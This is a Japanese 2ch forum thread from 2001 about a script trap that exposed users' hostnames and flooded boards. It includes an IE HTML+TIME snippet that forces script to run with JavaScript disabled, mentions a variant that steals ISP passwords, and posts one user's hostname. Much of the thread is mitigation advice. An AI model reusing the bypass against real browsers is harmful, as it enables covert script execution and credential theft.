心配なのでやってみるべ。

まあウイルス踏んだとしてもＨＤこわれとる
からいいや

すみません、詳しい人に聞きたいのですが、
セキュリティの設定で「暗号化されていないフォームデータの送信」に
ダイアログを出すようにしていれば書き込み回避できるんでしょうか？

309 名前：名無しさん＠お腹いっぱい。 ：01/12/18 00:14 ID:PMyYYMl7
とりあえず模倣犯人を1名発見
YahooBB218138012096.bbtec.net.2ch.net
こいつ大量にばらまいている
310 名前：名無しさん＠お腹いっぱい。 ：01/12/18 00:14 ID:PMyYYMl7
あ、ごめん、ゴミがついた
YahooBB218138012096.bbtec.net
こいつ
313 名前：（･∀･）ﾏﾀｰﾘｲｲ ◆UqQUyPuI ：01/12/18 00:24 ID:kRKEbA0D
ﾊﾞｶｰﾁｶﾞｳﾖ!!!!!
310ﾉﾜﾌﾝﾀﾞﾔﾂﾀﾞﾖ
316 名前：名無しさん＠お腹いっぱい。 ：01/12/18 00:27 ID:PMyYYMl7
>>313
いや、踏むにしても20回連続で踏み、スレも建てられる限り立てている
わざとやっていると思われる
317 名前：名無しさん＠お腹いっぱい。 ：01/12/18 00:29 ID:PMyYYMl7
しかもだな、おなじ板の中だけで閉じている筈なのに
違う板に飛び火したかのごとく投げつけているのは、
おそらくファイルを改ざんして被害者のふりをして
被害を拡大させているとおもわれる。
318 名前：名無しさん＠お腹いっぱい。 ：01/12/18 00:33 ID:PMyYYMl7
>>313,>>314
で、とりあえずバカという言葉はお返しするよ。
対策されていないうちに、うわこいつ、模倣犯だ、とわかってても
手口まで示して指摘したら模倣犯が増えるだろう？
つうことで、あとはよろしく。

かきこ

落ち着いたわいね。。

サーバー維持に支障発生!

834 ： ：01/12/17 22:52 ID:ic7RLSxJ
このプログラムを応用したら、プロバのパスワード表示されるようなのできたんだけど・・・
やばくね？

846 ：834 ：01/12/17 22:57 ID:ic7RLSxJ
パスワードが入ってるiniファイルを開いて、暗号解除して、
そのデータを自動ＦＯＲＭするだけ

949 ：834 ：01/12/17 23:47 ID:ic7RLSxJ
いや、ホントなんだが・・・
まあこれの場合ActiveX使ってるから、切っとけば大丈夫だけど、かなり悪質だと思う。
怖いからさすがに自分でも試せないよ。

糞スレ乱立！ 2ちゃんねらーに精神汚染が進んでいます！

>>642
それは、ハードデイスク上でＨＴＭＬを表示しているから可能なだけであって、
ネット上のサーバーにアップロードされたものでは効果が無い。
だから安全。

いかん! 8月末までに転送量を60％カットだ！

>>643
それは仕様です。

待て．

精神汚染されるのは643と647で十分です

つか強制IDだぞ（ｗ

しかし碇，このままでは2chが氏ぬぞ！

ひろゆき，なぜ戦わない?

放置？＜ML

>>644
レスthx

どちらにしろ怖い事にはかわりないか。
今回も「JAVASCRIPT切れば大丈夫」ってのとか言っててダメなのがあったし。

しかしまぁ。

ひろゆき，なぜ戦わない!?

何か・・・大事件のご様子。
裏２あるとの事で覗いたら
ツボの絵があった。
入るの怖かったのですぐ閉じたんだけど
一体何があったのでしょう？？
ＩＰ抜かれてるの？どうやって確かめるのかｷﾞﾎﾞ〜ﾝ
教えてちゃんですいません。
全部他のいろいろなスレッドの過去ｽﾚ読んでたんだけど
分かんないの。

へー。

それと、某板でのスレッドたてまくりな話しですが、
触れると悪化しそうなので、放置しましょう。。。
えぇえぇ。。

だそうですｗ

>>655
このスレにたどりついたんならわかるだろうが……

ネスケは関係ないんでしょ？

ひろゆきよく寝る人みたいだから
まだ寝てるんじゃない？
気が付いてないのかも＝寝てて

>>NoIZMFN6
このスレと前スレの過去ログくらい読みませう

心得をよく読みましょう、そしてログをよく読みましょう。

＞６５８
それが分かんないの・・・ヴァカな私。
批判板は書き込みがみんな早いんだよね・・・
追いつけないんだよね。

メルマガきたねぇ

>>663
もう止まってる。安心して過去ログ読んで平気です。

いつからここはエヴァ板に…

「【危機】フシアナサントラップになんらかの対処を＜２＞ 」
って言葉の意味が分からずにこのスレにきたのなら、
スレ違い、板違いを承知って事だよね。

んで、分かっててきたのなら、フシアナサンの意味わかるだろうし。


過去ログ読むのは基本だよ？

>>663
(　ﾟдﾟ) ﾎﾟｶｰﾝ
ひろゆき　うまい棒でこのスレと前スレ検索しる

メルマガ関係無いネタではないか

>>663　何がわからないのか教えてﾎｽｨ……(ﾟдﾟ)

やべ。。うちもトロイ出た。

ブラクラチェッカーか何かでリンク先のソースをチェックしないまま
ホイホイ見る奴の方がよほど問題。

>>671
まじっすか？

ひろゆきのレス見たところで…

これ画像が普通のエロ画像だったらみんな一生気付かずに
がんがん落ちてたんじゃないのか？
と思うと楽しい

専門用語（？）多いいし（＠ｏ＠）
>>79
覗けば抜かれてるか抜かれてないか
分かるって事？
踏むのが怖いんだけど・・・

>>655>>676
マジレスします。

このスレの住民は状況の重大さを感じて、ピリピリしています。
このスレを最初から読めばそれが、あなたにも伝わるでしょう。

きついことを書きますが、
このスレを最初から読んでも状況の重大さを体感できない（理解はできなくてもいいです）ならば、
数日間、２ｃｈには来ないほうがよいと思います。
それほど大変なことが起こっているのです。
あなたの楽観的な書き込みが、住民たちの神経を逆なでしている可能性もあります。

>>663
クリックしてから1時間00分後にハードディスクの中身が消える。
逆にいうと1時間経って何もなければ問題無い。

↓対処法はここのスレの1-3参照
今回のトラップについてpart3
http://teri.2ch.net/test/read.cgi/bobby/990629621/

>>678

だまされたよう
こうやってほいほいクリックするからダメなのね

>>670
踏むとＩＰが抜かれるのがあるようですが
私も抜かれてるという事？
裏２は中を覗くと何か不味いことがあるのでしょうか？
いろいろ読んでもﾑｽﾞｶﾁｨ用語やらで分かんないよ〜！！
何度も戻って新ｽﾚ読もうとしても思いっきり進んでるしさ〜シクシク

>>678
今ウイルスチェック中だけに心臓に来る、、、

専門用語っつーかなんつーか、
「ふしあなさん」とかは説明書みたいなのに書いてあるし、
「IP抜かれる」とかいう言い方をしてるんならある程度知識あるだろうし。

ある程度２ｃｈで雰囲気を掴んだりするのは基本だし、
それをやってるなら「教えて君」がタブーってのも知ってるはずだよね。


それ以前に、何をしりたいのか具体的に言ってくれにゃぁ分からんよ。

ハッキリ言って放置。
放置できない板も放置。

>>680
帰ってください

http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg
かわいい

>>677
すいません。出直します。
>>678
どうもありがとうございます。
一度切ってみます。（その前にもう一度読もう・・・頭悪いの・・）

>>685
そうだね。

11月19〜27日に報告された3つの問題点は，
パスワード盗難や個人情報漏洩などの恐れがあるもの。
米Microsoftは「早急にパッチをあてるように」と
ユーザーに呼びかけている。

http://www.zdnet.co.jp/news/0112/17/e_ie.html

>>685
しなやかに同意

>>688
そのパッチ関係ないみたいだよ

＞名前：分かんない？？ ：01/12/18 01:00 ID:NoIZMFN6

書き込んでるヒマあったらログ読んできて下さい。
話はそれから。

Gonerワームの作者はイスラエルの高校生
Gonerワームの作者として，4人のイスラエル人高校生が身柄を拘束された。少年らは容疑を認めている。
http://www.zdnet.co.jp/news/0112/11/e_goner.html

>>673
ちょっと返事が遅れたけどマジ。
ちゃんと駆除できた、、、ハズ

>>680
怪しいリンク(画像が出てくるもの)を踏んだ場合
あなたのＩＰを晒されて新しいスレが立てられてます
よってもう踏まないように
でないとサーバーへの負担が大きくなって
２ＣＨ自体がつぶれます
なおウイルス感染しているかもしれないので
チェックはしときましょう
ttp://housecall.antivirus.com/housecall/start_jp.asp
↑「オンラインウイルス検索｣へ行ってみよ

>>686
本スレの最初にリンクされている前スレを読むと
なんとなく状況がつかめると思います。

ウイルスバスターは時間かかるな。

まだやってたみたいだけどそろそろまとめ希望。
ひろるき、がんばってるよ。

ちょっと遅レスすぎだね
鬱なんで逝ってきます
＞＞６８６
まあ最初は誰でも初心者(俺もだけど)
そのうち慣れるよ

この１スレから参加してたのだけど、ウイルスとか内蔵されてたの？
ソースを見たけど。

ひろゆき氏のまとめ。

> それと、某板でのスレッドたてまくりな話しですが、
> 触れると悪化しそうなので、放置しましょう。。。
> えぇえぇ。。

帰ってきて、このスレ２ができているので。

できたばっかりでしらないひとのほうがおおいからこれからたいへんかも・・・でち

>>702
あっ、ひろぽんだ〜！

ウザイ奴ですいませんでした〜
11時頃からいろいろ読んでて今やっと分かりました。
『モナー』がでなかったから大丈夫そうです（怖くて見れなかった）
今さら「お前が言うな」ですが
「踏んじゃだめなのを教えてくれるのに直リンで貼るな〜！！」
２ちゃん閉鎖すぐの騒ぎですね。

ひろゆきをこき使えばなんとかなるでち

>>702
意味不明

>>699
ウイルスではなく、ＩＥのｾｷｭﾘﾃｨﾎｰﾙを利用した
Javaスクリプトが仕込まれてました。
暫定対処はされた模様。

┌───┐
│◎　 ◎│Ψ
>>702
あらっ

>>706
同意。さっぱりわからない。。俺がﾄﾞｷｭﾝなのかと思った。

>>702
ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━━!!!!!

ロボみたいなのがいない

いやあ、凄い騒ぎだったねえ。
半角が↓
http://medetai.kakiko.com/kopipe/u2.htm
になってたよ。。。

ｷﾃﾔｯﾀ━━━━━━│◎　 ◎│━━━━━━━!!!!! ﾃﾞﾁ

このできごと（じけん）になまえをつけるとしたら？

⊂（´-`⊂⌒｀つ事件

>>712
あの〜、>>702の解説をしていただけると助かるのですが。。

糞、１時間かけてもウイルスチェック終わらん。
寝る！

┌───┐
│◎　 ◎│Ψ
>>712
夜勤しゃんが、、あたふたした年の瀬。。。

>>712
CXのアナウンサー＠レンジでチンするときに使ってね事件

ひろぽん誕生！(14)〜切込隊長非公認FC〜
http://teri.2ch.net/test/read.cgi/accuse/1007885313/l50

前の方であったけど、「2ch同時多発エロ」じゃなかったっけ？

>>714
「毎日のようにだまされる人が出続ける」ってことでち！

>>712
年末ﾀﾂﾀｱｹﾞを晒しｱｹﾞ

　　　　　　冫─'　 ~　￣´^-、
　　　　　／　　　　　　　　　　丶
　　　　/　　　　　　　　　　　　　ﾉ、
　　　/　　／ヽ丿彡彡彡彡彡ヽヽ
　　　|　　丿　　　　　　　　　　　ミ
　　　|　彡　＿＿__　　＿＿__ 　ﾐ/
　　　ゝ_/／|　　　 |⌒|　　　 |ヽゞ
　　　|tゝ　　＼__／_　 ＼__／　| |
　　　ヽﾉ　　　　／＼_／＼　　 |ﾉ　　　 ＿＿＿＿＿＿＿
　　　　ゝ　　　/ヽ───‐ヽ　/　　／
　　　　 /|ヽ　　　ヽ──'　　 /　＜ 　Ｘ-BOYより兄ちゃんねる
　　　　/ | 　＼　　　￣　　／　　　＼
　 　／　ヽ　　 　‐-　　　　　　　 　　　￣￣￣￣￣￣￣

糞スレ乱立にうんざりした方はこちらへ！！

熱い語らいを約束する兄ちゃんねる
＜兄ちゃんねる＞
http://www.i-love-you.gr.jp/suball/index.cgi?ID=1
＜かちゅ〜しゃ用ファイル＞
http://www.i-love-you.gr.jp/2channel.brd

>>720
りょうか〜い。なんとなくわかったでち！

毎日のようにだまされる人が出続けるでち！事件

「ｼﾞｻｸｼﾞｴﾝスクリプトだいじけん！」

＞７２０
解決してないジャン。

┌───┐
│◎　 ◎│Ψ
>>725
２ｃｈじゃ、、まいにちでしゅ〜〜〜。。。

http://www.geocities.co.jp/Milkyway-Gemini/4761/

>>ひろぽん
今はもう「うまい棒」は食べてないの？

　　　　　　冫─'　 ~　￣´^-、
　　　　　／　　　　　　　　　　丶
　　　　/　　　　　　　　　　　　　ﾉ、
　　　/　　／ヽ丿彡彡彡彡彡ヽヽ
　　　|　　丿　　　　　　　　　　　ミ
　　　|　彡　＿＿__　　＿＿__ 　ﾐ/
　　　ゝ_/／|　　　 |⌒|　　　 |ヽゞ
　　　|tゝ　　＼__／_　 ＼__／　| |
　　　ヽﾉ　　　　／＼_／＼　　 |ﾉ　　　 ＿＿＿＿＿＿＿
　　　　ゝ　　　/ヽ───‐ヽ　/　　／
　　　　 /|ヽ　　　ヽ──'　　 /　＜ 　Ｘ-BOYより兄ちゃんねる
　　　　/ | 　＼　　　￣　　／　　　＼
　 　／　ヽ　　 　‐-　　　　　　　 　　　￣￣￣￣￣￣￣

糞スレ乱立にうんざりした方はこちらへ！！

熱い語らいを約束する兄ちゃんねる
＜兄ちゃんねる＞
http://www.i-love-you.gr.jp/suball/index.cgi?ID=1
＜かちゅ〜しゃ用ファイル＞
http://www.i-love-you.gr.jp/2channel.brd

根本的な対策はなされてないのかな

騒いでる前からtatutaﾀﾝとこに突入してる連中いるけど
まぁ返事が楽しみだ、っと。

┌───┐
│◎　 ◎│Ψ
>>729
ひろぽんはプリングルズでち。。。

なんか大変だから、ひろぽんキャラをだしてきた。
いやだね。

こちとら、真剣に考えていたのにね。

>>733
本当に？知らなかったよ。
つーか最近売ってた【クリスピーカレー味】、美味しいよね？

┌───┐
│◎　 ◎│Ψ
>>736
ひろぽんはピザあじがすきでしゅ〜〜〜。。。

>>734-735
( ﾟдﾟ)ﾎﾟｶｰﾝ

　┌───┐
　│◎　 ◎│Ψ
「これからスクリプトをふみそうなひとにどれだけふまないようにさせるか・・」
だとおもうんでち

いとてきにふんでるひとも、もんだいでしゅけど・・

>>737等
お前らスレ違いだから来るな。
ハウス！

うちのあプロだにzip圧縮で15.gifのスクリプトがあがってたんだけど
これ、ふんでも作動しないけど、あぷったやつ晒し上げた方がいいのかな？

>>740
>ハウス！

凍りそうになりました（ﾟдﾟlll）

>>740
ひろぽんに絡む厨房 （・∀・）ｶｺｲｲ!

>>741 ほどほどに晒したほうがおもろいと思うが

>>742　寒いよね

>>741
ひろゆきにメールでどうするか聞いてみたら？

技術的な対策は難しいのか。トーシロはすっこんでますね。

>>740
何をムキになってる。
癒し系キャラがわからないの？

>>740
>ハウス
ちょっとだけﾜﾗﾀ

>>743
ひろぽんは可
にせぽん以下は不可だと思う

>>748
>>740って冗談じゃないの？ムキになっちゃﾀﾞｰﾒよぉ。

なんでもOK　＞にせぽんでも何でも
マッタリできれば

殺伐とした出来事だからこそマッタリも必要

>>748
なかなか強力なマジレスですね

おれ、ひろゆき好きだけど、ひろぽんキャラ嫌いなのです。

>744
>746
ん、ひろゆきにメールしてみる。
うちのあぷろだIPぶっこぬいてるし。

>>737
ホットスパイシーもいい味出してるよ。

>>755
「それがかいけつのいとぐちになってくれればいいんでちけど・・」

>>754
夜勤さん説は

>>757
ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━━!!!!!

>>754
嫌いなら放置じゃないのか？他の人がどう思ってるかわからんだろうに。

>>754
凄い物を敵に回したな、

今日は★をよく見るなぁ……

>>760>>761
スレに関係ないし、マジレスも程々にまったりするでち。あびゃ

>>762
http://teri.2ch.net/bobby/

>>762
しし座流星群だよ

ひろぽんが・・・・(^_^;)

>>764
？

ひろぽんとひろゆきって同一人物なの？

>>768
え？

>>769
違うの？

つくったひともこんなおおさわぎになるとおもってたのかきになるでち！
ねらってたかのようなスクリプトでしゅけどね・・

そろそろねるでしゅ！

あびゃ

>>771
おやすみなさい。
なんかロボがいないとちょっと地味だな

>>771
元服発見！

あいー
バイ！
今日は、御苦労さまでした。

　　　　　 （ヽ＿ﾉ）　　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣
〜′￣￣( ｀へ´)　＜　　ひろぽんはAAあったほうが際立つな
､､)ノU￣￣U､)ノ　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿

>>771
あびゃ！

>>771-773

>>768
どーぞ

★ひろゆきが変なキャラに・・・
http://corn.2ch.net/entrance/kako/996/996243150.html

▼ひろぽんに関するガイドライン
http://ton.2ch.net/test/read.cgi/gline/1005846909/

夜勤さんと同一人物？
http://salami.2ch.net/entrance/kako/1005/10057/1005748771.html

おやすみー

で…どうなった？

>>771
おやすみ

>>504に念の為補足。

何か混同してる人がいるようだが、14日にMicrosoftが発表したMS01-058の脆弱性↓とは無関係だぞ。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

Javascriptをオフにしてあっても実行されてしまうのは
IE5.5以降の仕様のせいだ。(>>79参照)

>>778
ありがと〜！ヽ(*´ー｀)ﾉ

>>693
俺もトロイでました、、今回のと関係あるのか、無関係なのかわかりませんが。。
ただの日頃の不始末の予感は大いにあるが。

フシアナサントラップでウイルス感染しました（鬱

まちがえた。673です。

ひろゆきに　ipいりまっかメールとスクリプトのzip
おくっといた。

>757
ほんと、これが解決の糸口になりゃいいんだがなぁ

でもなぁ、モ板住人の一部が使うあぷろだだからなぁ
犯人とは関係ないっぽいよな。

このスレッドの52〜をみよ！
http://piza.2ch.net/accuse/kako/967/967489588.html/

>>787
もし犯人見つかったらどういう対処するんだろう？

>>789
放置でいいんじゃね。
zipで圧縮してるからソースとしての利用だし

ぜんざい　しめじ　ひらめ　えのき
ぜんざい　しめじ　ひらめ　えのき
セフィロス！！　セフィロス！！

なるほど
ソースを元に2ch側を対策させるんか
いたちごっこの予感・・

でもこれって犯罪だよね？＞スクリプト貼った人

>790
ソース流して、亜種の作成促すともとれる。
考えすぎ？

ふぅ。トロイもウイルスも検出されず…。

チェッカーで試したらモナーが出てきた・・・
どこで漏れのＩＰ晒されているんだろう
なんか鬱

発生元はどこなん？

JAVA切ってても駄目なの？

>>797
IEのバージョンによる。

>>797
今回のアレですが、
IE5.5、IE6ではjavascriptオフでも実行されてしまうそうです。

利用された仕様の部分
−−−−−−−−−−−−−−

強制的にスクリプトを実行
IE5.5以降 将来変更の可能性有
HTML+TIME2という新技術を応用して、スクリプトがOFFの状態でも強制的にスクリプトを実行してしまいます。ただし、ページのロード完了後にしか実行できませんので、document.write(〜)といった操作を行うスクリプトを使えません。

<script id=scr1 language=JScript for=window event=onload>
alert('Hello World!!');
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>

これウイルス感染するのか？

>>797

>>79
>>242
>>504

5.00だよ

>>798-801
情報サンキュー

>>795
これだけ大量に晒されてりゃ埋もれてるよ。
気にするな。気にするな。気にするな。。。
気にしだしたら、俺なんかーーーー！！！（号泣

>>800
和塩のヤツがブラクラ付きだったから、もしかするとjavascriptオンの場合何かついてくるかも。

http://www2.sala.or.jp/~uuu/dhtml/forcescript.html
ｷｴﾄﾙ？

発生源よりも今は対策だろ？

>>806
ｷｴﾄﾙ・・・・

>>808
ｵﾓｼﾛｿｳﾀﾞﾀﾉﾆ
http://www.google.co.jp/search?num=30&hl=ja&q=cache%3Awww2.sala.or.jp%2F%7Euuu%2Fdhtml%2F&lr=lang_ja

PROXY規制ってでて他の板で書けなくなっちゃったんですが
これの暫定対策となにか関係あるんでしょうか？

>>806
googleキャッシュ
http://www.google.co.jp/search?q=cache:http%3A%2F%2Fwww2%2Esala%2Eor%2Ejp%2F%7Euuu%2Fdhtml%2Fforcescript%2Ehtml

某スレからの出張です
ウイルスとの関連ははっきりせんようですが
今日は随分とこのスクリプトの被害者いらっしゃいましたので一応お節介に参りました
この機会に（トラップが原因かどうかしれなくとも）ウイルス感染した方
よろしければどうぞ
http://www.trendmicro.co.jp/trial/freetool.htm
こちらに各ウイルス対応の修復ツールがあります
ﾀﾞｳｿして実行するだけなので自前の駆除ソフトない方お試しください
それでは差し出口失礼致しました

今踏むとヤバイのどれ？だいたい対策とったんでしょ？

ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/gbs/10085206260.htm
の２６見てみ

あれ、まだ使えるトラップあります？

>>814
うーん？？？

てｓｔ

クッキーをONにしてるのにエラーが出る…

タツタたんはどうなったん？

test

まだ有効なトラップがあるようでしたら、こちらにお寄せくださいませ。
http://jbbs.shitaraba.com/computer/79/DiSC.html

　　ｔｔｐ://obuchi.naikaku.com/angriff/upred/source/1478.jpg 「末尾の数字はいろいろ」
　　http://ｗｗｗ.geocities.co.jp/Milkyway-Gemini/4761/
これもう大乗仏陀？

犯人はあっさりと謝罪した模様？
ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/gbs/10085206260.htm

ほんもの？

ひろゆき、謝罪メールｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!の？

でもメールが来たという信憑性が無いぞ

タツタが犯人に４チキンタツタ。

自分の鯖にうｐする奴はいないだろ

串アナさん

まだやってるのか？ガキンチョども

>>829
最近は天然さんが多いからなんとも言えん…。

これの対策で芋電話から書き込みできなくなったんだが

Googleで検索してもお絵描き掲示板上の方にないなぁ……

つーか、
お絵描き掲示板にファイルうｐする裏技ってなんだよ（ｗ

またもや引っかかった？（藁＞漏れ

Googleで「お絵かき掲示板 2ch poo」で検索して出てくる
お絵かき掲示板で外部から直リンできるところで最初に現れるのが
「お絵かき掲示板」www2j.biglobe.ne.jp／~ｔatuta ／ｃgi-bin／ｐaint／finish.html(ｐicuture.cgiにﾘﾀﾞｲﾚｸﾄ)
poo siteのお絵かき掲示板のCGIは、単純にファイルの内容をPOSTするだけで誰でもファイルを投稿できます。

>>834
裏技というか、
(BBS NOTEであぷろだ機能がoffでも無理やり投稿する)ツールがあるべ。

っていうか騒ぎすぎ。
連続投稿が続いて鯖が重くなったこと、削除人達の負担、スクリプト対応に追われる負担
などの物理的負担はよーくわかる。
被害を被ったひろゆき夜勤ﾏｧｳﾞ猫あたりの管理サイドの奴らが
しかるべき対処法を取るならわかるよ。やれやれーって思うし。

ただそれ以外のクソ一般ユーザーが鼻息荒くして
責任取れ!!謝罪しる!!ってなってるのがﾜﾗえるんだよ。
自分がアホみたいに無防備だった結果
2ch閲覧者何千人にホスト晒して大恥かいた報復私怨を感じる(w
罠はかかるほうがヴァカ、ってガイドラインに書いてるだろーが(ｹﾞﾗ
ｳﾞｧｶが多かったから各種規制もキツクなっちまったーな。

俺もひっかからなかった。
知らずにやるから騙されるんですな。

芋復帰はいつ？

　今朝の８時頃に、「かちゅ〜しゃ」でタ●タの15.gifを踏んだ私が書くのもな
んですが、気になることを書き込みます。

　「fusianasanトラップ」の効果から考えて、このスクリプトを弄れば、任意の
メッセージを書き込むことも可能だと思います。
　つまり、トラップにかかったコンピュータの情報や使用者の情報をＪＳｃｒｉ
−ｐｔで得ることが出来れば、機密情報などを抜き取って晒すことが可能という
ことです。
　そして、ＩＥでは、これを実現できる可能性があります。
　ＩＥを使用している方は、以下を参考に、設定を見直すことをおすすめします。


　ＩＥのＪＳｃｒｉｐｔには、「クリップボードの内容を読み込む機能」があります。
　どのバージョンから付いた機能かは知りませんが、少なくとも、ＩＥ５．５に
は、この機能が付いています。

　クリップボードにパスワードなどの重要な情報をコピーする可能性があると思
う方は、以下を参考に、「クリップボードの内容を読み込む機能」を無効にする
ことをおすすめします。

１．メニューで
「ツール＞インターネット オプション」をえらび、「インターネット オプショ
ン」のダイアログを出します。

２．「インターネット オプション」のダイアログで
「セキュリティ」をえらび、「レベルのカスタマイズ」を選択すると、「セキュ
リティの設定」ダイアログが開きます。

引っ掛かったらどうすんの？
引っ掛かんなかった人は良いかもだけど引っ掛かったら普通騒ぐよ。

３．「セキュリティの設定」ダイアログで
「スクリプト＞スクリプトによる貼り付け処理の許可」を無効にして下さい。


Ｐ．Ｓ．
　私の思いつくトラップ対策としては、既出の「直リン禁止」の他に、「リンク
先への転送専用ページを用意して、トラップに与えるリファを転送専用ページの
ものにする。」という方法が思い浮かびましたが、トラップの方で板をねらい撃
ちされると、これらの方法では、お手上げです。
　別の方法として、次のように、書き込みに規制をかける方法もありますが・・・。

　私のＨＰに設置している掲示板では、数日、「掲示板自動書き込みソフト」に
よる連続投稿に悩まされたことがあったため、掲示板のスクリプトに外部から書
き込まれにくくする対策を施しました。
　外部からの書き込みが不可能というわけではありませんが、この対策は、約１
年経過した現在でも有効に機能しています。
　その時に使った方法やそれを強化した方法が今回のトラップにも有効だと考え
られるので、需要があるようでしたら、ひろゆき氏にメールを出そうと思います。
　ただし、この対策の仕様を公開してしまうと、それに対応したトラップが出て
くる可能性があり、対策の意味が無くなるので、その影響で「かちゅ〜しゃ」な
どの専用ブラウザから書き込めなくなる可能性が高いと思います。
　私自身は、「かちゅ〜しゃ」を使いたいのでこの対策はとって欲しくないので
すが、みなさんのお気持ちは、どうでしょうか？
　今現在はメールを書けないため、テレホまで様子を見て、メールを送るかどう
か判断したいと思います。

以上。
長文、連続投稿、失礼しました。このレスが気にさわった方、ごめんなさい。

ふむ、いいんじゃない？
このさいIEのすばらしさを復活させよう。

必要な時は余計な事を言わずに即行動に移す、これが2ch流。。。

あぁ、ここにも厨房がいる。。。

>>838
私怨とか恥とかそういうレベルの問題ではないと思われ。
今回のトラップに引っかかってリモホさらされたユーザがどれだけ
多いことか。それでお前、DoS攻撃の踏み台候補が膨れ上がってるんだぞ。
今回のブラクラに引っかかる初心者にはポートスキャンのポの字もわかんない
奴が多いだろう。あわせてトロイが蔓延してるってうわさもあるし。

「２ちゃんねるユーザから大量DoS攻撃！踏み台に利用され」なんてニュース
でも建ってみろ。インターネット全体の問題だぞ。

引きこもってないでたまには社会に出（以下省略）

>>843
「掲示板自動書き込みソフト」と違いブラウザではRefererを
偽装することができないので、現状のままでも、
自動的に書き込めれるトラップが出てくる可能性は皆無です。

みなさん漏れがみんなの研究用に一時的にウｐした
ブラクラつきの亜種はウィルスなんてつけてませんで安心してください(削除済み)
んじゃ。

いまさらだけど、よく訴えられないね、フシアナサンって

訴えることが出来る人の元へ謝罪メルが届いたやら届いてないやら、、、

乱立したスレッドはいつ削除してもらえるんでしょうか。

＞851
どこの板？

ｄおう：；

がいしゅつだと思うが取り合えず
裏２ちゃんへようこそ！！
http://piza2.2ch.net/test/read.cgi/mona/1008577556/l50
1 名前：【覇王】無我亭国初代皇帝無我 ◆jxZETMAM 投稿日：2001/12/17(月) 17:25 ID:ROG8+U+2

競馬板ですhttp://ebi.2ch.net/keiba/subject.txt
下のほうにある無題スレッドなんですが。

名前入れ忘れました。
たぶん、フシアナサントラップで乱立したスレッドだと思います。

FFDQ板の
スレ名：ムーンブルク王女の髪は紫色！
http://game.2ch.net/test/read.cgi/ff/1007315854/l50
で、この馬鹿が例のfusianasanトラップを貼り付けていました。

120 ：名無しさん＠ＬＶ2001 ：01/12/17 10:30 ID:???
俺からも

>>857
それ俺だ。
いやあ、まじですまんかった。

>>842　>>846
IP厨房よ、やられてから文句垂れる前に
今度から防衛に気をつけましょーねん★

今はもうフシアナとか被害見ないけど、どんな対処したの？

>>806
２ちゃんねらーらしいから晒されてたことに気付いたんだろう
http://www.google.co.jp/search?q=cache:http%3A%2F%2Fwww2%2Esala%2Eor%2Ejp%2F%7Euuu%2F

対策はどうなってるわけ？
漏れの考えとしては、同じタイトルのスレは立てられないようにすればいいかと思ったが、
そうするとそれに引っかからないようになった亜種が登場するっぽいので却下（ｗ

板スクリプト側で対策するなら投稿時のﾁｪｷｺｰﾄﾞ発行だろうね
そうすりゃ1回はSocket通さないと攻撃できないだろうし
面倒臭いけど ( ´Д｀)y-~~~

誰かがアクセスするたびにどっかでCGI回して変数抜いて打ち込んで
夜勤さんと耐久力勝負をするならそれはそれで面白い ｗ

＞855
それは単に馬鹿が糞スレ乱立させただけだべ。

対策はリファラチェックを厳密にやることでもう終わってるって。
過去ログ見てよ。

HTML+TIMEの仕様を調べてみたけど任意のスクリプトを実行する機能などない。
やはりバグだと思われ
http://msdn.microsoft.com/workshop/author/behaviors/reference/time2_entry.asp

【HTML+TIMEを無効にする方法】
「ファイル名を指定して実行」で
regsvr32 /u mstime.dll
を実行する。

【その他】
「暗号化されていないフォームデータの送信」を「ダイアログを表示」
にしておくとスクリプトが送信するときでも確認のダイアログが出る
のですこしはマシになる。

>>865
任意のスクリプトを実行することができるとは書かれててないけど、
部分的にスクリプトのまねごとができるようになってます。
それを上手く利用すれば任意のスクリプトが実行できるが、
それが仕様なのかバグなのかは未だ不明です。
Microsoftは未だ気づいてないので教えた方がいいかもしれません。

以前はgoogleキャッシュからも投稿可能だったが、
今現在は出来ないんで対策はばっちりなされたってことでいいのかな？

>>868
ばっちり。

まあ今回の件はひっかかった奴もいるけどわざとのやつもいたってわけで。

http://ascii24.com/news/i/topi/article/2001/08/13/628749-000.html
↑なんだこれ。主犯は西やん？

>>866
【HTML+TIMEを無効にする方法】
のあと、有効に戻す方法もプリーズ。
永久脱毛と一緒で、元に戻せないとなるとおいそれと試せない。。

>>872
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default Behaviors
レジストリのここを消せばHTML+TIMEが無効になり、
元に戻せばHTML+TIMEが有効に戻ります。

>>872
regsvr32 mstime.dll

>>871
太りすぎ（プ

>>873-874
thx！

>876
>873 の方法でレジストリいじってみました。（キー削除する前に一応
バックアップ）その後、>>47 でテストしたら真っ白の画面でした。
当方、Win2000Pro+IE6、かちゅです。

戻す時はバックアップしたレジストリキーを読み込めばOK。

今更なんですが、自分がたてたらしきスレが見あたらなかった。自分がたてたスレ
を見つけられた人っています？　外出だったらｽﾏｿ。
半角とかが飽和攻撃に晒されてダウンしかけたのを見つめて不謹慎にもこういう事が
出来るんだなと感心してしまったことは正直済まなかったと思っています。

>>878
自分のリモホが>1の名前欄に出るから簡単に分かったよ？
本来subbbs.cgiで表示されるはずの
「スレッド立てすぎ」「クッキーをオンにしてちょ」が確認できないから
君の場合は立たなかったのかも。

元サイトの管理者タツタ氏、降臨！

ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/gbs/10085206260.htm

>>50 名前:タツタ★ 投稿日:2001/12/18(Tue) 22:40
>>すいません。>>26はパスワード打ち間違えたみたいです。
>>
>>poo掲示板にアップロードという技があるのは、
>>耳にしたことがあるのですが、やり方は知りません。
>>今回問題になった掲示板はすでに使用しなくなって、
>>トップページからはリンクされていなかったのですが、
>>削除せずに残っていたため、検索され利用されてしまったようです。
>>１日１回は巡回しているのですが、
>>使用していない掲示板だったため発見が遅れてしまいました。
>>セキュリティの弱い掲示板を放置していたという点は、
>>私の認識不足であり、ご迷惑おかけ致しました。
